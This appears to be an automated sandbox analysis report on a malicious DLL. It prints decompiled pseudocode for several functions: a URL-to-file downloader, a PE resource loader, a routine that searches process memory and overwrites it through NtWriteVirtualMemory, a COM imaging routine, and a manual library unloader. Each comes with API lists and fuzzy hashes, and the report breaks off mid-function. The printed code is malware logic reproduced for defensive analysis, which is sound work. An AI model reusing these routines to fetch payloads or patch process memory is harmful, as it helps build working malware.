Instruction Fuzzy Hash: 38219A33640703ABEB109ADD8E59F9A7678F786705F000519FB55BB2C9E370D800EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA5A00, Relevance: 12.1, APIs: 8, Instructions: 81
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA5A00() {
				char* _v16;
				CHAR* _v36;
				void* _v1048;
				void _v1068;
				long _v1076;
				long _v1080;
				void _v1084;
				void* _v1088;
				long _v1092;
				long _v1096;
				char* _t13;
				long _t23;
				void* _t27;
				long _t33;
				void* _t36;
				void* _t38;

				_t13 = M6ECB0518; // 0x0
				_t33 = 0;
				_t38 = InternetOpenA(_t13, 0, 0, 0, 0);
				_v1048 = _t38;
				if(_t38 != 0) {
					_t27 = InternetOpenUrlA(_t38, _v16, 0, 0, 0x846a0000, 0);
					if(_t27 != 0) {
						_t36 = CreateFileA(_v36, 0x40000000, 0, 0, 2, 0x80, 0);
						if(_t36 != 0xffffffff) {
							_v1080 = 0;
							_v1076 = 0;
							do {
								if(InternetReadFile(_t27,  &_v1068, 0x400,  &_v1080) == 0) {
									goto L7;
								} else {
									_t23 = _v1096;
									if(_t23 != 0) {
										WriteFile(_t36,  &_v1084, _t23,  &_v1092, 0);
										goto L7;
									}
								}
								break;
								L7:
							} while (_v1096 > 0);
							_t33 = 1;
							CloseHandle(_t36);
							_t38 = _v1088;
						}
						InternetCloseHandle(_t27);
					}
					InternetCloseHandle(_t38);
				}
				return _t33;
			}

0x6eca5a06
0x6eca5a0d
0x6eca5a1a
0x6eca5a1c
0x6eca5a22
0x6eca5a40
0x6eca5a44
0x6eca5a68
0x6eca5a6d
0x6eca5a75
0x6eca5a79
0x6eca5a83
0x6eca5a97
0x00000000
0x6eca5a99
0x6eca5a99
0x6eca5a9f
0x6eca5aaf
0x00000000
0x6eca5aaf
0x6eca5a9f
0x00000000
0x6eca5ab1
0x6eca5ab1
0x6eca5ab9
0x6eca5abe
0x6eca5ac4
0x6eca5ac4
0x6eca5ac9
0x6eca5acf
0x6eca5ad1
0x6eca5ad7
0x6eca5ae2

APIs

InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6ECA5A14
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,846A0000,00000000), ref: 6ECA5A3A
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 6ECA5A62
InternetReadFile.WININET(00000000,?,00000400,?), ref: 6ECA5A93
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6ECA5AAF
CloseHandle.KERNEL32(00000000), ref: 6ECA5ABE
InternetCloseHandle.WININET(00000000), ref: 6ECA5AC9
InternetCloseHandle.WININET(00000000), ref: 6ECA5AD1

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseFileHandle$Open$CreateReadWrite
String ID:
API String ID: 2705228764-0
Opcode ID: aef716bebfbb05206519406342be0ac25c3d971e3ce4cf38c1b8e49e6f7536d4
Instruction ID: 043e67bedcbf38d539dbab188d82bbeb7c44903afe3db90e35375173e0e5304a
Opcode Fuzzy Hash: aef716bebfbb05206519406342be0ac25c3d971e3ce4cf38c1b8e49e6f7536d4
Instruction Fuzzy Hash: 09214171204746ABD220DE598D88FAB7ABCEBCA714F014A1DBE5593141E770E905CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA4E50, Relevance: 12.1, APIs: 8, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA4E50(struct HINSTANCE__* _a4, WCHAR* _a8) {
				signed int _t20;
				struct HINSTANCE__* _t22;
				int _t23;
				struct HRSRC__* _t28;
				void* _t29;
				void* _t30;
				void* _t32;

				_t22 = _a4;
				_t30 = 0;
				_t28 = FindResourceW(_t22, _a8, 5);
				if(_t28 == 0) {
					return 0;
				} else {
					_t32 = LoadResource(_t22, _t28);
					if(_t32 != 0) {
						_t23 = SizeofResource(_t22, _t28);
						_t29 = LockResource(_t32);
						if(_t29 != 0) {
							_t30 = HeapAlloc(GetProcessHeap(), 8, _t23);
							RtlMoveMemory(_t30, _t29, _t23);
							_t20 =  *(_t30 + 0xc);
							if((_t20 & 0x40000000) == 0) {
								 *(_t30 + 8) =  *(_t30 + 8) & 0xfffbffff | 0x08000080;
							}
							 *(_t30 + 0xc) = _t20 & 0xefffffff;
							 *((intOrPtr*)(_t30 + 0x16)) = 0;
						}
						FreeResource(_t32);
					}
					return _t30;
				}
			}

0x6eca4e55
0x6eca4e5f
0x6eca4e67
0x6eca4e6b
0x6eca4ee9
0x6eca4e6d
0x6eca4e76
0x6eca4e7a
0x6eca4e85
0x6eca4e8d
0x6eca4e91
0x6eca4ea4
0x6eca4ea8
0x6eca4ead
0x6eca4eb5
0x6eca4ec6
0x6eca4ec6
0x6eca4ed0
0x6eca4ed3
0x6eca4ed3
0x6eca4ed7
0x6eca4ed7
0x6eca4ee3
0x6eca4ee3

APIs

FindResourceW.KERNEL32(?,?,00000005), ref: 6ECA4E61
LoadResource.KERNEL32(?,00000000), ref: 6ECA4E70
SizeofResource.KERNEL32(?,00000000), ref: 6ECA4E7E
LockResource.KERNEL32(00000000), ref: 6ECA4E87
GetProcessHeap.KERNEL32(00000008,00000000), ref: 6ECA4E96
HeapAlloc.KERNEL32(00000000), ref: 6ECA4E9D
RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 6ECA4EA8
FreeResource.KERNEL32(00000000), ref: 6ECA4ED7

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$Heap$AllocFindFreeLoadLockMemoryMoveProcessSizeof
String ID:
API String ID: 1815471765-0
Opcode ID: 086af6a5469a6c8e54a7e8fae05a95aee2e359b638c4aa2470a7d14b8e94af96
Instruction ID: 413b66127525eab61832f96fa80a1a767996e742f7de20a3b4e65617e3572365
Opcode Fuzzy Hash: 086af6a5469a6c8e54a7e8fae05a95aee2e359b638c4aa2470a7d14b8e94af96
Instruction Fuzzy Hash: 8A113372600B06ABD7105AEEDC58E6BFFBDEB85765B114519FA16C3250EA34D8018B60

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA19F0, Relevance: 9.1, APIs: 6, Instructions: 143
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6ECA19F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				void* _v44;
				intOrPtr _v172;
				char _v356;
				long _v360;
				void* __edi;
				void* __esi;
				void* _t52;
				void* _t69;
				intOrPtr _t70;
				intOrPtr* _t83;
				signed int _t85;
				intOrPtr _t88;

				_t82 = _a4;
				_t69 = 0;
				if(_a4 != 0) {
					_t91 = _a8;
					_v44 = 0;
					_v24 = 0;
					_v16 = 0;
					_v20 = 0;
					_v4 = 0;
					_t88 = E6ECA1400( &_v356, _t82, _a8);
					if(_t88 != 0) {
						_t83 = _a16;
					} else {
						_t70 = _a12;
						_push( &_v356);
						_t88 = E6ECA14E0(_t70);
						if(_t88 != 0) {
							_t83 = _a16;
						} else {
							_t88 = E6ECA15C0( &_v356, _t82, _t91, _t70);
							if(_t88 != 0) {
								L18:
								_t83 = _a16;
								goto L19;
							} else {
								_t88 = E6ECA1660( &_v356);
								if(_t88 != 0) {
									goto L18;
								} else {
									_t88 = E6ECA1720( &_v356);
									if(_t88 != 0) {
										if(_v24 != 0) {
											_t85 = 0;
											if(_v20 > 0) {
												do {
													FreeLibrary( *(_v24 + _t85 * 4));
													_t85 = _t85 + 1;
												} while (_t85 < _v20);
											}
											HeapFree(GetProcessHeap(), 0, _v24);
										}
										goto L18;
									} else {
										_t88 = E6ECA18D0( &_v356);
										if(_t88 != 0) {
											goto L18;
										} else {
											_t83 = _a16;
											if(_t83 != 0) {
												_v12 =  *((intOrPtr*)(_t83 + 0x2c));
												_v8 =  *((intOrPtr*)(_t83 + 0x30));
											}
											_t88 = E6ECA19A0( &_v356, _t70);
											if(_t88 != 0) {
												L19:
												_push(0x8000);
												_push( &_v360);
												_push( &_v28);
												_push(0xffffffff);
												_v360 = 0;
												L6ECAC2D6();
											} else {
												if(_t83 != 0) {
													 *((intOrPtr*)(_t83 + 0xc)) = _v32;
													 *((intOrPtr*)(_t83 + 0x10)) = _v28;
													 *((intOrPtr*)(_t83 + 0x14)) = _v4;
													 *((intOrPtr*)(_t83 + 4)) = 0x3c;
													 *((intOrPtr*)(_t83 + 8)) = _t70;
													 *((intOrPtr*)(_t83 + 0x18)) = _v172;
													 *(_t83 + 0x1c) = _v24;
													 *((intOrPtr*)(_t83 + 0x20)) = _v20;
												}
											}
										}
									}
								}
							}
						}
						_t52 = _v44;
						if(_t52 != 0) {
							HeapFree(GetProcessHeap(), 0, _t52);
						}
						_t69 = 0;
					}
					if(_t83 != _t69) {
						 *_t83 = _t88;
					}
					return _t88;
				} else {
					_t2 = _t69 - 2; // -2
					return _t2;
				}
			}

0x6eca19f8
0x6eca19ff
0x6eca1a03
0x6eca1a12
0x6eca1a20
0x6eca1a27
0x6eca1a2e
0x6eca1a35
0x6eca1a3c
0x6eca1a48
0x6eca1a4f
0x6eca1be0
0x6eca1a55
0x6eca1a55
0x6eca1a60
0x6eca1a68
0x6eca1a6f
0x6eca1bba
0x6eca1a75
0x6eca1a81
0x6eca1a88
0x6eca1b90
0x6eca1b90
0x00000000
0x6eca1a8e
0x6eca1a96
0x6eca1a9d
0x00000000
0x6eca1aa3
0x6eca1aa8
0x6eca1aac
0x6eca1b4f
0x6eca1b51
0x6eca1b5a
0x6eca1b62
0x6eca1b6d
0x6eca1b6f
0x6eca1b70
0x6eca1b62
0x6eca1b8a
0x6eca1b8a
0x00000000
0x6eca1ab2
0x6eca1ab7
0x6eca1abb
0x00000000
0x6eca1ac1
0x6eca1ac1
0x6eca1aca
0x6eca1ad2
0x6eca1ad9
0x6eca1ad9
0x6eca1aea
0x6eca1af1
0x6eca1b97
0x6eca1b97
0x6eca1ba0
0x6eca1ba8
0x6eca1ba9
0x6eca1bab
0x6eca1bb3
0x6eca1af7
0x6eca1af9
0x6eca1b14
0x6eca1b1e
0x6eca1b28
0x6eca1b32
0x6eca1b39
0x6eca1b3c
0x6eca1b3f
0x6eca1b42
0x6eca1b42
0x6eca1af9
0x6eca1af1
0x6eca1abb
0x6eca1aac
0x6eca1a9d
0x6eca1a88
0x6eca1bc1
0x6eca1bca
0x6eca1bd6
0x6eca1bd6
0x6eca1bdc
0x6eca1bdc
0x6eca1be9
0x6eca1beb
0x6eca1beb
0x6eca1bf9
0x6eca1a06
0x6eca1a06
0x6eca1a10
0x6eca1a10

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA1BCF
HeapFree.KERNEL32(00000000), ref: 6ECA1BD6

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 81c4801e870b1239c11fec86b1c90c191d6e900dd782a1419bc415cefec91a90
Instruction ID: e537ce5594d3cd7fd025495921d8b3fdae64ecb2059774503e12e4265785ff21
Opcode Fuzzy Hash: 81c4801e870b1239c11fec86b1c90c191d6e900dd782a1419bc415cefec91a90
Instruction Fuzzy Hash: E0514DB55087429BC3708F9DD880ADBB7F9BBC8354F014A2DDA8997344E735A849CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA8400, Relevance: 9.1, APIs: 6, Instructions: 90
nativeCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E6ECA8400() {
				intOrPtr _v4;
				intOrPtr _v12;
				intOrPtr _v28;
				long _v40;
				void _v44;
				void* _v48;
				intOrPtr _v56;
				long _v80;
				char _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				long _v108;
				intOrPtr _v116;
				intOrPtr _v128;
				long _v132;
				long _t26;
				long _t28;
				long _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t42;
				long _t44;
				union _MEMORY_INFORMATION_CLASS _t47;
				void* _t49;
				intOrPtr _t52;

				_t31 = 0;
				_v80 = 0;
				_t26 = NtQuerySystemInformation(0,  &_v44, 0x2c,  &_v80);
				if(_v28 <= 0) {
					return _t26;
				} else {
					_t52 = _v12;
					_t42 = _v4;
					do {
						_push(0x1c);
						_push( &_v88);
						L6ECAC2EE();
						_t47 = 0;
						_v108 = 0;
						_t28 = NtQueryVirtualMemory(0xffffffff, _t31, 0,  &_v96, 0x1c,  &_v108);
						if(_t28 >= 0 && _v128 == 0x1c) {
							_t32 = _v116;
							if(_v100 == 0x1000 && _v96 == 4 && _v92 == 0x20000 && _v104 != _t42) {
								while(1) {
									_t28 = _t47 + _t32;
									__imp__RtlCompareMemory(_t52, _t28, _t42);
									if(_t28 == _t42) {
										break;
									}
									_t47 = _t47 + 1;
									if(_t47 < _v116 - _t42) {
										continue;
									}
									goto L11;
								}
								_t44 = _v40;
								_t49 = _t47 + _t32;
								_v132 = 0;
								_t30 = NtWriteVirtualMemory(0xffffffff, _t49, _v48, _t44,  &_v132);
								_push(_t44);
								_push(_t49);
								_push(0xffffffff);
								L6ECAC336();
								return _t30;
							}
							L11:
							_t31 = _t32 + _v104;
						}
					} while (_t31 < _v56);
					return _t28;
				}
			}

0x6eca840f
0x6eca8413
0x6eca8417
0x6eca8420
0x6eca84f2
0x6eca8426
0x6eca8427
0x6eca842c
0x6eca8431
0x6eca8431
0x6eca8437
0x6eca8438
0x6eca8449
0x6eca844f
0x6eca8453
0x6eca845a
0x6eca846b
0x6eca846f
0x6eca8490
0x6eca8491
0x6eca8496
0x6eca849e
0x00000000
0x00000000
0x6eca84a4
0x6eca84a9
0x00000000
0x00000000
0x00000000
0x6eca84a9
0x6eca84c1
0x6eca84d0
0x6eca84d5
0x6eca84dd
0x6eca84e2
0x6eca84e3
0x6eca84e4
0x6eca84e6
0x00000000
0x6eca84ed
0x6eca84ab
0x6eca84ab
0x6eca84ab
0x6eca84af
0x6eca84c0
0x6eca84c0

APIs

NtQuerySystemInformation.NTDLL ref: 6ECA8417
RtlZeroMemory.NTDLL(?,0000001C), ref: 6ECA8438
NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,0000001C,0000001C,?), ref: 6ECA8453
RtlCompareMemory.NTDLL(?,00000000,?), ref: 6ECA8496
NtWriteVirtualMemory.NTDLL ref: 6ECA84DD
NtFlushInstructionCache.NTDLL(000000FF,00000000,?), ref: 6ECA84E6

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Memory$QueryVirtual$CacheCompareFlushInformationInstructionSystemWriteZero
String ID:
API String ID: 145697856-0
Opcode ID: 92bdbddc8fdcd93e62d6c8dcaaa6e0767290826994ed08ae17d255c7e79ee310
Instruction ID: dacf5185e5f6dacb8eced0360f7520e875a5afdcec785b1555503dc23a4581af
Opcode Fuzzy Hash: 92bdbddc8fdcd93e62d6c8dcaaa6e0767290826994ed08ae17d255c7e79ee310
Instruction Fuzzy Hash: 9F21C272108346AFD310DE99DC84EABBBA9EBC4764F400B1DFAA456144E774D9448B62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA6480, Relevance: 7.7, APIs: 5, Instructions: 205
comCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E6ECA6480() {
				intOrPtr* _v24;
				intOrPtr _v40;
				void* _v104;
				void* _v112;
				intOrPtr* _v124;
				char _v128;
				char* _v132;
				char _v136;
				intOrPtr* _v140;
				intOrPtr* _v144;
				char _v148;
				intOrPtr* _v152;
				intOrPtr* _v160;
				void* _v164;
				intOrPtr _v168;
				intOrPtr* _v180;
				void* _v184;
				char _v192;
				short _v196;
				char _v200;
				intOrPtr* _v208;
				intOrPtr _v224;
				intOrPtr* _v236;
				intOrPtr* _v244;
				intOrPtr* _v256;
				intOrPtr* _v264;
				intOrPtr* _v276;
				char* _t66;
				intOrPtr* _t68;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr* _t86;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr* _t95;
				intOrPtr* _t98;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t108;
				intOrPtr* _t111;
				intOrPtr* _t114;
				intOrPtr* _t116;
				short _t164;

				_t164 = 0;
				__imp__CoInitializeEx(0, 0);
				_t66 =  &_v104;
				_v104 = 0;
				__imp__CoCreateInstance(0x6ecadb8c, 0, 1, 0x6ecaddac, _t66);
				if(_t66 < 0) {
					L19:
					__imp__CoUninitialize();
					return _t164;
				}
				_t68 = _v124;
				_push( &_v112);
				_push(2);
				_push(0);
				_v112 = 0;
				_push( *_v24);
				_push(_t68);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t68 + 0x54))))() < 0) {
					L18:
					_t71 = _v144;
					 *((intOrPtr*)( *((intOrPtr*)( *_t71 + 8))))(_t71);
					goto L19;
				}
				_t73 = _v144;
				_v136 = 0;
				_push( &_v136);
				_push(_t73);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x38))))() < 0) {
					L17:
					_t76 = _v140;
					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
					goto L18;
				}
				_t78 = _v144;
				_push(_v40);
				_push(_t78);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x38))))() < 0) {
					L16:
					_t81 = _v152;
					 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 8))))(_t81);
					goto L17;
				}
				asm("movq xmm0, [0x6ecadb9c]");
				_t83 = _v160;
				_push( &_v164);
				asm("movq [esp+0x30], xmm0");
				asm("movq xmm0, [0x6ecadba4]");
				_push( &_v128);
				_v164 = 0;
				asm("movq [esp+0x3c], xmm0");
				_push(0x6ecadbac);
				_push(_t83);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x20))))() < 0) {
					goto L16;
				}
				_t86 = _v180;
				_push(2);
				_push(_v168);
				_push(_t86);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))() < 0) {
					L15:
					_t89 = _v192;
					 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89);
					goto L16;
				}
				_t91 = _v192;
				_push( &_v184);
				_v196 = 0;
				_v184 = 0;
				_push( &_v196);
				_push(_t91);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x28))))() >= 0) {
					L6ECAC2EE();
					_v132 = L"ImageQuality";
					__imp__#8( &_v192,  &_v136, 0x20);
					asm("movss xmm0, [0x6ecada54]");
					_v196 = 4;
					_t95 = _v208;
					asm("movss [esp+0x2c], xmm0");
					 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x10))))(_t95, 1,  &_v148,  &_v196);
					_t98 = _v236;
					_push(_v224);
					_push(_t98);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t98 + 0xc))))() >= 0) {
						asm("movq xmm0, [0x6ecadbbc]");
						_t105 = _v244;
						_push(_v128);
						asm("movq [esp+0x40], xmm0");
						asm("movq xmm0, [0x6ecadbc4]");
						asm("movq [esp+0x48], xmm0");
						_push(_v132);
						_push(_t105);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t105 + 0x10))))() >= 0) {
							_t108 = _v256;
							_push( &_v200);
							_push(_t108);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x18))))() >= 0) {
								_t111 = _v264;
								_push(0);
								_push(_v244);
								_push(_t111);
								if( *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x2c))))() >= 0) {
									_t114 = _v276;
									_push(_t114);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t114 + 0x30))))() >= 0) {
										_t116 = _v276;
										_push(_t116);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t116 + 0x2c))))() >= 0) {
											_t164 = 1;
										}
									}
								}
							}
						}
					}
					_t101 = _v244;
					 *((intOrPtr*)( *((intOrPtr*)( *_t101 + 8))))(_t101);
					_t103 = _v236;
					 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))(_t103);
				}
			}

0x6eca6484
0x6eca6488
0x6eca648e
0x6eca64a0
0x6eca64a4
0x6eca64ac
0x6eca66c9
0x6eca66c9
0x6eca66d5
0x6eca66d5
0x6eca64b2
0x6eca64ba
0x6eca64c1
0x6eca64c3
0x6eca64c4
0x6eca64ca
0x6eca64cb
0x6eca64d3
0x6eca66bd
0x6eca66bd
0x6eca66c7
0x00000000
0x6eca66c7
0x6eca64d9
0x6eca64e1
0x6eca64e7
0x6eca64e8
0x6eca64f0
0x6eca66b1
0x6eca66b1
0x6eca66bb
0x00000000
0x6eca66bb
0x6eca64f6
0x6eca6500
0x6eca6501
0x6eca6509
0x6eca66a5
0x6eca66a5
0x6eca66af
0x00000000
0x6eca66af
0x6eca650f
0x6eca6517
0x6eca651f
0x6eca6524
0x6eca652a
0x6eca6532
0x6eca6533
0x6eca6537
0x6eca653f
0x6eca6544
0x6eca654c
0x00000000
0x00000000
0x6eca6552
0x6eca655c
0x6eca655e
0x6eca655f
0x6eca6567
0x6eca6699
0x6eca6699
0x6eca66a3
0x00000000
0x6eca66a3
0x6eca656d
0x6eca6575
0x6eca657a
0x6eca657e
0x6eca6584
0x6eca6585
0x6eca658d
0x6eca659a
0x6eca65a4
0x6eca65ac
0x6eca65b2
0x6eca65c4
0x6eca65c9
0x6eca65d2
0x6eca65e0
0x6eca65e2
0x6eca65ec
0x6eca65ed
0x6eca65f5
0x6eca65ff
0x6eca6607
0x6eca660b
0x6eca6610
0x6eca6616
0x6eca661e
0x6eca6626
0x6eca6627
0x6eca662f
0x6eca6631
0x6eca663b
0x6eca663c
0x6eca6644
0x6eca6646
0x6eca6650
0x6eca6651
0x6eca6652
0x6eca665a
0x6eca665c
0x6eca6665
0x6eca666a
0x6eca666c
0x6eca6675
0x6eca667a
0x6eca667c
0x6eca667c
0x6eca667a
0x6eca666a
0x6eca665a
0x6eca6644
0x6eca662f
0x6eca6681
0x6eca668b
0x6eca668d
0x6eca6697
0x6eca6697

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000), ref: 6ECA6488
CoCreateInstance.OLE32(6ECADB8C,00000000,00000001,6ECADDAC,?), ref: 6ECA64A4
RtlZeroMemory.NTDLL(?,00000020), ref: 6ECA659A
VariantInit.OLEAUT32 ref: 6ECA65AC
CoUninitialize.OLE32 ref: 6ECA66C9

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInitInitializeInstanceMemoryUninitializeVariantZero
String ID:
API String ID: 884428471-0
Opcode ID: 8203bda6a9b630d009662cfc5fd465d8e4e5a05deb9a6034e84f3406d32ecf42
Instruction ID: 7c6c3e2e18b0edd9541da62dfeb81d10876908a0bc96beea648b04d08a5f1441
Opcode Fuzzy Hash: 8203bda6a9b630d009662cfc5fd465d8e4e5a05deb9a6034e84f3406d32ecf42
Instruction Fuzzy Hash: E071A5B4614702AFD700DFA9C890E5AB7F9AFC9704B108958FA49CB260DB71E946CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA1C00, Relevance: 6.1, APIs: 4, Instructions: 69
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E6ECA1C00(intOrPtr _a4) {
				long _v4;
				intOrPtr* _t24;
				intOrPtr _t30;
				signed int _t37;
				intOrPtr _t39;
				void* _t40;

				_t39 = _a4;
				_t40 = 1;
				if(_t39 == 0 ||  *((intOrPtr*)(_t39 + 4)) != 0x3c ||  *((intOrPtr*)(_t39 + 0xc)) == 0) {
					L14:
					return 0;
				} else {
					_t30 = _t39 + 0x10;
					_a4 = _t30;
					if( *((intOrPtr*)(_t39 + 0x10)) == 0) {
						goto L14;
					} else {
						if( *(_t39 + 0x1c) != 0) {
							_t37 = 0;
							if( *((intOrPtr*)(_t39 + 0x20)) > 0) {
								do {
									FreeLibrary( *( *(_t39 + 0x1c) + _t37 * 4));
									_t37 = _t37 + 1;
								} while (_t37 <  *((intOrPtr*)(_t39 + 0x20)));
								_t30 = _a4;
							}
							HeapFree(GetProcessHeap(), 0,  *(_t39 + 0x1c));
						}
						if(( *(_t39 + 8) & 0x00000001) == 0) {
							_t24 =  *((intOrPtr*)(_t39 + 0x14));
							if(_t24 != 0) {
								_t40 =  *_t24( *((intOrPtr*)(_t39 + 0xc)), 0, 0);
							}
						}
						_push(0x8000);
						_push( &_v4);
						_push(_t30);
						_push(0xffffffff);
						_v4 = 0;
						L6ECAC2D6();
						return _t40;
					}
				}
			}

0x6eca1c04
0x6eca1c08
0x6eca1c0f
0x6eca1cb3
0x6eca1cb7
0x6eca1c29
0x6eca1c2d
0x6eca1c30
0x6eca1c34
0x00000000
0x6eca1c36
0x6eca1c3a
0x6eca1c3d
0x6eca1c42
0x6eca1c50
0x6eca1c57
0x6eca1c59
0x6eca1c5a
0x6eca1c5f
0x6eca1c5f
0x6eca1c70
0x6eca1c76
0x6eca1c7b
0x6eca1c7d
0x6eca1c82
0x6eca1c8e
0x6eca1c8e
0x6eca1c82
0x6eca1c90
0x6eca1c99
0x6eca1c9a
0x6eca1c9b
0x6eca1c9d
0x6eca1ca5
0x6eca1cb0
0x6eca1cb0
0x6eca1c34

APIs

FreeLibrary.KERNEL32 ref: 6ECA1C57
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA1C69
HeapFree.KERNEL32(00000000), ref: 6ECA1C70
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 6ECA1CA5

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$Heap$LibraryMemoryProcessVirtual
String ID:
API String ID: 1020761401-0
Opcode ID: 83d685927752f34a01f3a07dc2b72e7d350c085bcddaace896b3ba3be975a263
Instruction ID: eec58156d58d4437c2b6c0dca0ce63267ff7607eed61fb5c46bf2eb21bc9a6fc
Opcode Fuzzy Hash: 83d685927752f34a01f3a07dc2b72e7d350c085bcddaace896b3ba3be975a263
Instruction Fuzzy Hash: FF2160B12047169FE720CF9CD884B67B3F8FB88759F004A1DE69697684E770E848CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAB270, Relevance: 4.5, APIs: 3, Instructions: 37
nativememorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECAB270(void** _a4) {
				void* _t6;
				void* _t7;
				void** _t13;
				signed int _t17;
				void* _t20;
				void* _t22;

				_t13 = _a4;
				if( *_t13 != 0) {
					_t17 = 0;
					if(_t13[2] <= 0) {
						L7:
